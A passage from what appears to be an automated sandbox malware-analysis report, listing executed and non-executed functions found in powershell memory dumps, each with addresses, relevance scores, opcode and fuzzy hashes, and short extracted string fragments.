                • Instruction Fuzzy Hash: 41B16DB0A10204DFDB14DB64C454BAEBBA3EF88311F548468D906AF795CB32EC46CF91
                Function 04A895F8 Relevance: .3, Instructions: 266COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2544796650.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_4a80000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ace9cb9d65dcc130a2e24e7d994b8805ec839751f4ec8f86cbcafdc0bdbce21e
                • Instruction ID: 1e2bd7a7a6d067711bc1408d2cc063ec0d204ac4e0aaada52d55451a6c02f8c5
                • Opcode Fuzzy Hash: ace9cb9d65dcc130a2e24e7d994b8805ec839751f4ec8f86cbcafdc0bdbce21e
                • Instruction Fuzzy Hash: 3EA16E71A002099FDB14EFA4C584AAEBBF6FF84710F158558E806AF365DB34AD49CB80
                Function 04A8FAB4 Relevance: .3, Instructions: 262COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2544796650.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_4a80000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 251f1d63047f5c704441be8c6c011495825b4c4e7a650e03d41ca2675bc11c34
                • Instruction ID: 57d1abb1ba4fccae6449ccd70df0224f2431a27d5d6db81ff864df7adbb39ecf
                • Opcode Fuzzy Hash: 251f1d63047f5c704441be8c6c011495825b4c4e7a650e03d41ca2675bc11c34
                • Instruction Fuzzy Hash: C0B14070E0020ADFDB24EFA9D89579DBBF1EF88314F14852DE815EB254EB74A845CB81
                Function 04A82B48 Relevance: .2, Instructions: 224COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2544796650.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_4a80000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a23a62a080a131901df7a9edea1bdd769ae87578a93ad891186cc41efbfe2d33
                • Instruction ID: 1965cabbc38001a5f018de6c1d6ee8fb5281be5f689998969ef270a1f706910d
                • Opcode Fuzzy Hash: a23a62a080a131901df7a9edea1bdd769ae87578a93ad891186cc41efbfe2d33
                • Instruction Fuzzy Hash: 47919C75A006058FCB15DF99C494ABAFBB1FF89310B24859AE855EB3A5C335FC41CBA0
                Function 04A88DE8 Relevance: .2, Instructions: 212COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2544796650.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_4a80000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 51aed255fbb606a5525c8d031f8420b232b20b6b9610ed209a212b3b94f92915
                • Instruction ID: 20ffe7e19b9a7d8ee5366aa72892be3ccb6fb30db87d55b4a169e4d8fa98b4bd
                • Opcode Fuzzy Hash: 51aed255fbb606a5525c8d031f8420b232b20b6b9610ed209a212b3b94f92915
                • Instruction Fuzzy Hash: 48819F30A012449FCB15EFA4D884AADBBF2FF89314F5885ADE445AB362DB35EC45CB50
                Function 076C7182 Relevance: .2, Instructions: 201COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5aacb8ab316495938cb939457f550551055bf21f44b408fc300c3eecd520dcaf
                • Instruction ID: f9671b2ff4d35f9a5f3f5280a7e363028a4a2008f74b0e754cb94543d95e4aae
                • Opcode Fuzzy Hash: 5aacb8ab316495938cb939457f550551055bf21f44b408fc300c3eecd520dcaf
                • Instruction Fuzzy Hash: E7718DB0A00201EFDB14DB64C454BA9BBA3EF84305F54C46CEA0A6F795CB36E845CF91
                Function 04A89D48 Relevance: .2, Instructions: 192COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2544796650.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_4a80000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e0503f9dd53fa4770b3ee25fff6f9a6eb9cf501868e4c5c9ac3cb488ba761e47
                • Instruction ID: 9898ce85628ce7d5b4784ee507cec69749d1642fba3070f4c19a137ce7c1d6d9
                • Opcode Fuzzy Hash: e0503f9dd53fa4770b3ee25fff6f9a6eb9cf501868e4c5c9ac3cb488ba761e47
                • Instruction Fuzzy Hash: 7C719E70A00309DFDB14DF68D880AAEBBF6FF85314F14856AD459DB651DB71AC46CB80
                Function 04A89EB6 Relevance: .2, Instructions: 188COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2544796650.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_4a80000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 20a693a952cfacbb0155dbfb120bcbd44a9192493a9c48d80a3118c654c99ffd
                • Instruction ID: 45eadcb93c99e13333de3def9d3d8de3ad3be6a0442f7ad7e92c4966c3ac71da
                • Opcode Fuzzy Hash: 20a693a952cfacbb0155dbfb120bcbd44a9192493a9c48d80a3118c654c99ffd
                • Instruction Fuzzy Hash: 77711A70A00208DFDF14EFA5D494AAEBBF6FF88304F148529D415AB790DB75AC45CB91
                Function 04A89D33 Relevance: .1, Instructions: 119COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2544796650.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_4a80000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b6352b7e8b121802b805500cee2379ae593935843ca5345d008d1bafe8e82177
                • Instruction ID: 2f08f409ec000f2f06508b3b302e6ebde9b5077912d0af9207f1d14ff033f122
                • Opcode Fuzzy Hash: b6352b7e8b121802b805500cee2379ae593935843ca5345d008d1bafe8e82177
                • Instruction Fuzzy Hash: AD413C70A00708DFDB24EFA9C8446AEBBF6FF89314F14852DD415AB690DB75AC45CB80
                Function 04A89AD9 Relevance: .1, Instructions: 119COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2544796650.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_4a80000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fd096e4cf4314e9b8d905880edac561a36e7c025e85857d43ea7209a32fe038c
                • Instruction ID: a87e24affb0a5c4f034d4201646c0c160136a144d11a547e32a5de71dd4556ed
                • Opcode Fuzzy Hash: fd096e4cf4314e9b8d905880edac561a36e7c025e85857d43ea7209a32fe038c
                • Instruction Fuzzy Hash: 57418BB1A04244DFDB14EB65C958AAEBBF6FF89354F18406DE402EB7A0CB75AC41CB50
                Function 04A82C58 Relevance: .1, Instructions: 107COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2544796650.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_4a80000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0fffdd0e7e8186702ce9fc13597c0cdcefc4ae7a3f38d0dcba25e18e53fc761b
                • Instruction ID: ba353a1e068ac29810238644e50551e28cbf6b90844ebca9f614f589af57723e
                • Opcode Fuzzy Hash: 0fffdd0e7e8186702ce9fc13597c0cdcefc4ae7a3f38d0dcba25e18e53fc761b
                • Instruction Fuzzy Hash: E8414875A002059FCB15DF89C594EBAFBB1FF48310B158599D815AB3A4C736FC91CBA0
                Function 076C8DB6 Relevance: .1, Instructions: 102COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 49861c2ef047475f216ce9d5d8cdff0811cf9fcda6f0a25bfba90d01b6db3bee
                • Instruction ID: 2aca2aae6c2d2f8bda7bc067015abbedafb3bc89e0e590e22baa54f70d63ed2d
                • Opcode Fuzzy Hash: 49861c2ef047475f216ce9d5d8cdff0811cf9fcda6f0a25bfba90d01b6db3bee
                • Instruction Fuzzy Hash: 92318474B10204AFEB14AB64C950BAE7A63EFC4355F148418EA02AF7D5CF76EC46CB91
                Function 04A839C8 Relevance: .1, Instructions: 90COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2544796650.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_4a80000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c09f9816dd0516f5899bbd2b0492498bd3f02e110f97acc732dc24581d8a3598
                • Instruction ID: 6649bcba5d76d8e6bca237ffeac13fa0449f7e64916e9f26c7372ecece22ffd7
                • Opcode Fuzzy Hash: c09f9816dd0516f5899bbd2b0492498bd3f02e110f97acc732dc24581d8a3598
                • Instruction Fuzzy Hash: 34319570D093959FDB11DF6CC8A099ABFB0EF4A210B05409BD845DF352D635EC45CBA6
                Function 04A839D8 Relevance: .1, Instructions: 73COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2544796650.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_4a80000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e303df0d1081ffe7915f0a0023a759f7be3695fc164c2fd5a334058cf083bf3a
                • Instruction ID: c5e179f775220451a9d539d620465fd269bcd579298ec790caefb6a164509ae2
                • Opcode Fuzzy Hash: e303df0d1081ffe7915f0a0023a759f7be3695fc164c2fd5a334058cf083bf3a
                • Instruction Fuzzy Hash: 4A215CB4E042599FCB10DF58D8909AAFBB4FF49300B54819AE809EB352D736EC45CBA1
                Function 04A845B0 Relevance: .1, Instructions: 68COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2544796650.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_4a80000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5940ae39c494d4c62f1e974f389cabc383746132f63da56ff81e4472a3bd9a27
                • Instruction ID: 7d1b444b99c4608d758f030837d9abb291f00b58fa3628421f28c74e3788ec29
                • Opcode Fuzzy Hash: 5940ae39c494d4c62f1e974f389cabc383746132f63da56ff81e4472a3bd9a27
                • Instruction Fuzzy Hash: B4210774A0060A9FCB44DF99C4809AAFBB1FF4D310B1581A9E809EB761C735EC91CBA0
                Function 0499D01D Relevance: .0, Instructions: 45COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2543815938.000000000499D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0499D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_499d000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 77d3acff9f3f781d0a631c862bf64c48f3bca4aab63f09d6e56fd17f8e8c25c3
                • Instruction ID: 4c551781783008c76f1691b1296dcdf8c554206b3853c063efed2389da22d01b
                • Opcode Fuzzy Hash: 77d3acff9f3f781d0a631c862bf64c48f3bca4aab63f09d6e56fd17f8e8c25c3
                • Instruction Fuzzy Hash: 0C01F731609304AFEB204E29ECC4B66BFDCDF41325F18C629DC480B182D279AC45CAB2
                Function 0499D006 Relevance: .0, Instructions: 45COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2543815938.000000000499D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0499D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_499d000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 229cd3af64e8756cfc20d6ea713e6ee83e2a30746134f11997919ad91d8c1cf9
                • Instruction ID: cc311807bf4339cba893bdb7aaeaefa49e2df12fde53c857b7acd46aa82355d7
                • Opcode Fuzzy Hash: 229cd3af64e8756cfc20d6ea713e6ee83e2a30746134f11997919ad91d8c1cf9
                • Instruction Fuzzy Hash: 10015E6110E3C09FE7128B259C95B52BFB8DF43224F19C1DBD9888F1A3C2699849CB72
                Function 076CB1F6 Relevance: .0, Instructions: 31COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 22c229d50457adeb31654ec67f53cb1a91bd7bb622bb07143ebaa76f9cb9ade0
                • Instruction ID: e479aff9f413795704f0d3df2666cd6b1335ab9d3e718cfe5be58554454f7121
                • Opcode Fuzzy Hash: 22c229d50457adeb31654ec67f53cb1a91bd7bb622bb07143ebaa76f9cb9ade0
                • Instruction Fuzzy Hash: 9CF055F2E4429087CB25957828122BEB765DBC1670B08046DCE4B6F311C57ADC1283D6
                Function 076CB1D7 Relevance: .0, Instructions: 30COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f7fad62651e73cbaf9efa64496a7f55b64a77bdec754c4a150976c43db4f0067
                • Instruction ID: 63a5dc9755c9ad2cb8408974be3b285cf1978b6bffba6a80b84011f8ff201397
                • Opcode Fuzzy Hash: f7fad62651e73cbaf9efa64496a7f55b64a77bdec754c4a150976c43db4f0067
                • Instruction Fuzzy Hash: E9F02BF2F102948B5B25DA78681217F7375EBC4261714452ECA078F344CE34DD12C3D6
                Function 076C4571 Relevance: .0, Instructions: 25COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d473fc86c96a06226a0c04e51713f68e74a40870e9060578e4e73560b82cf37b
                • Instruction ID: 7103de596564d584a5a808a06d39276e168168a35bcf765f505ef50200113a16
                • Opcode Fuzzy Hash: d473fc86c96a06226a0c04e51713f68e74a40870e9060578e4e73560b82cf37b
                • Instruction Fuzzy Hash: F6E02BE8600181A7C758DBE4C454462FFA2FB9A110718C49FDD464E143DD21D803C711
                Function 076CB243 Relevance: .0, Instructions: 21COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ca1f6615b4199f3d1255b8c6feae0964cee7d962adb2c0c9b50106dbd06ce398
                • Instruction ID: a66cec2d319d91f2445324cb11d325288f60adaa64b13cd9a6cd88cad84f35f3
                • Opcode Fuzzy Hash: ca1f6615b4199f3d1255b8c6feae0964cee7d962adb2c0c9b50106dbd06ce398
                • Instruction Fuzzy Hash: D0D0A7F7B20018CB8B1452757C020BEB341EAC927A7155576C90BEB300C5318C2353D4
                Function 076CB250 Relevance: .0, Instructions: 15COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b237fc06983c8ef278e885bdce1a71b599804afec95d827f4a3780b677862288
                • Instruction ID: b682c70c08c3584fbeef4002d3f40254fea1fc355212e72fb6b8cf54402d1fb8
                • Opcode Fuzzy Hash: b237fc06983c8ef278e885bdce1a71b599804afec95d827f4a3780b677862288
                • Instruction Fuzzy Hash: DFD012F3B14158CA461451B878120BDB359E7E5165B14417BC907D7244D57589278798

                Non-executed Functions

                Function 0499D6F8 Relevance: .1, Instructions: 75COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000013.00000002.2543815938.000000000499D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0499D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_499d000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 330255366a10b3211532650f27ccbbcabfcaa67272b5eeee31bbf41d3458ba48
                • Instruction ID: 5c4570b6171d9f5af27481b4a7306c79f2f7b98651b81086d2c83f27545cac75
                • Opcode Fuzzy Hash: 330255366a10b3211532650f27ccbbcabfcaa67272b5eeee31bbf41d3458ba48
                • Instruction Fuzzy Hash: 652128B6604204DFDF15DF18D9C4B16BBA6FBD8324F248679D8090B246C336E856CBA1
                Function 076C0BB0 Relevance: 18.0, Strings: 14, Instructions: 488COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: (oq$(oq$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq$tPq$tPq
                • API String ID: 0-4031905499
                • Opcode ID: 6167e86eb21ae5f5f58b7441373a59119ac8944b76c79856ff7e02979a407bc5
                • Instruction ID: 9fe645e7b402ef6317a0710b8dbca2e5a01f96c53e0e116dbd6a5b633ac22eec
                • Opcode Fuzzy Hash: 6167e86eb21ae5f5f58b7441373a59119ac8944b76c79856ff7e02979a407bc5
                • Instruction Fuzzy Hash: 6A0292B1B00219DFDB28CF64D855A7ABBA6FF89310F18846DE9069B351CB31DC42CB91
                Function 076C3658 Relevance: 12.8, Strings: 10, Instructions: 312COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q
                • API String ID: 0-4104424984
                • Opcode ID: bd4a82fd831f78965679e0fc9597cd14fc4f8b46d6c1171629ae842026481140
                • Instruction ID: 701304a528378d663143bb5c8b911ee63fb0faf9b3f2aa92826210cd3f3989c4
                • Opcode Fuzzy Hash: bd4a82fd831f78965679e0fc9597cd14fc4f8b46d6c1171629ae842026481140
                • Instruction Fuzzy Hash: 2FA1F3F17043068FDB25DA7B991527A7BA5EF86250B28C4AED807CB351DA31DC42C7A2
                Function 076CDB98 Relevance: 8.9, Strings: 7, Instructions: 153COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 4'q$TQq$TQq$tPq$$q$$q$$q
                • API String ID: 0-2980145124
                • Opcode ID: 9e5a81eb5b500bb22ede783a77cea468e3975f5eeb44dfa41b06609f25ffeac4
                • Instruction ID: 9d40935cb958cbbc0426ed48628d7f32b64f0acfee38cb76d87e0f8611415f17
                • Opcode Fuzzy Hash: 9e5a81eb5b500bb22ede783a77cea468e3975f5eeb44dfa41b06609f25ffeac4
                • Instruction Fuzzy Hash: 83518EF0B10206DFDB28CE25C54477AB7A6FB85351F19847EE8069B394C771E981CB91
                Function 076CCD30 Relevance: 7.7, Strings: 6, Instructions: 214COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 4'q$4'q$$q$$q$$q$$q
                • API String ID: 0-1538229613
                • Opcode ID: 2e46afdf180fd938a52dfbc4f89c7b5c4843c6f2583b54e0d096d34952931e06
                • Instruction ID: cf439303519113e3f0b2a0472727a718deb8940ad3c19220388356662dad5f9a
                • Opcode Fuzzy Hash: 2e46afdf180fd938a52dfbc4f89c7b5c4843c6f2583b54e0d096d34952931e06
                • Instruction Fuzzy Hash: 8561F5B17042199FDB24CB39D4142BABBA2EF8A251F18C46ED81ACB355CB31D942D7B1
                Function 076CE98D Relevance: 7.7, Strings: 6, Instructions: 194COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: XRq$XRq$XRq$tPq$tPq$$q
                • API String ID: 0-422185277
                • Opcode ID: 27f28d1e25c99bdf04b6c1b8e14ccda948babba08490fc4e913c67448b29f69b
                • Instruction ID: 067129d5b45fd74a1053665c794128184b2936d57d75de71d17a667ab018d989
                • Opcode Fuzzy Hash: 27f28d1e25c99bdf04b6c1b8e14ccda948babba08490fc4e913c67448b29f69b
                • Instruction Fuzzy Hash: 9E61B471B002059FDB25DBB58541679BBB2FF89211F18C5AEE4079F381DA32DD42CBA1
                Function 076C1450 Relevance: 6.6, Strings: 5, Instructions: 301COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 4'q$4'q$tPq$tPq$tPq
                • API String ID: 0-1844223728
                • Opcode ID: f9b23ebad545b2afb4c2294020ae381828d9d2f17dc6022cf93f98647a0dfc2b
                • Instruction ID: c831ee9ed1b1d026699242cc40935516636824c450f2f53bf21427823e714706
                • Opcode Fuzzy Hash: f9b23ebad545b2afb4c2294020ae381828d9d2f17dc6022cf93f98647a0dfc2b
                • Instruction Fuzzy Hash: 6EA1F8F1B043598FDB29DB79941567ABBA2DF87211F18C0AED907CB352DA31C806C7A1
                Function 076CF0E8 Relevance: 5.4, Strings: 4, Instructions: 374COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 4'q$4'q$4'q$4'q
                • API String ID: 0-4210068417
                • Opcode ID: 48efb6eed3d5ce3acc546f4544e6779f25e7e22ede1a91c8862c5a0b657ed012
                • Instruction ID: 6e317d28b298523d56954a2c6d35ac1bd9fecec594a9f97dccf4bb3ee688ffa9
                • Opcode Fuzzy Hash: 48efb6eed3d5ce3acc546f4544e6779f25e7e22ede1a91c8862c5a0b657ed012
                • Instruction Fuzzy Hash: 0FE190B1A003099FDB25DBA5C451BAEBBA3EF88314F14842DD9066F794CB31EC46CB91
                Function 076C0B8F Relevance: 5.2, Strings: 4, Instructions: 248COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 4'q$4'q$tPq$tPq
                • API String ID: 0-1392854178
                • Opcode ID: ed755eab70097e7c65eb56af273c1d2a649604c3e5477e7bacd9dda9963e9db3
                • Instruction ID: 8eafd0550da38d731a4c9fc65c77cf765c6fe3fc535774c3489576790364b658
                • Opcode Fuzzy Hash: ed755eab70097e7c65eb56af273c1d2a649604c3e5477e7bacd9dda9963e9db3
                • Instruction Fuzzy Hash: 60A16CB5A11219DFDB24CF64C945AB9BBB2FF49310F18809EE916AB351C731EC81CB91
                Function 076C23A8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: $q$$q$$q$$q
                • API String ID: 0-4102054182
                • Opcode ID: 3aa51596ca074d068a3de31c71d0851f2615108bfdde3e5566bf6752dd990f6c
                • Instruction ID: 5d8d4b05f2419c2f799e6c1dc2bba847c0af329cab22cfdea197c517799f5508
                • Opcode Fuzzy Hash: 3aa51596ca074d068a3de31c71d0851f2615108bfdde3e5566bf6752dd990f6c
                • Instruction Fuzzy Hash: A821F3B13103169FE724997AD8617377796FBC5615F64C42EAD0BCB381CD35C84682A1
                Function 076C12E9 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 4'q$4'q$$q$$q
                • API String ID: 0-3199993180
                • Opcode ID: 49e2170230432bcce3e5ee4be5a71b8daf4c3f0fd43229bfdc6eca0dd30aa98e
                • Instruction ID: fabdc2c0cf31a16c7c0d082667165b83fb1ef0260f2f919e3f317e68f57a9175
                • Opcode Fuzzy Hash: 49e2170230432bcce3e5ee4be5a71b8daf4c3f0fd43229bfdc6eca0dd30aa98e
                • Instruction Fuzzy Hash: F6019EE1A0D39A8FD32F927868201757FB2AFD340571E409BD446CB747C9158C0683A7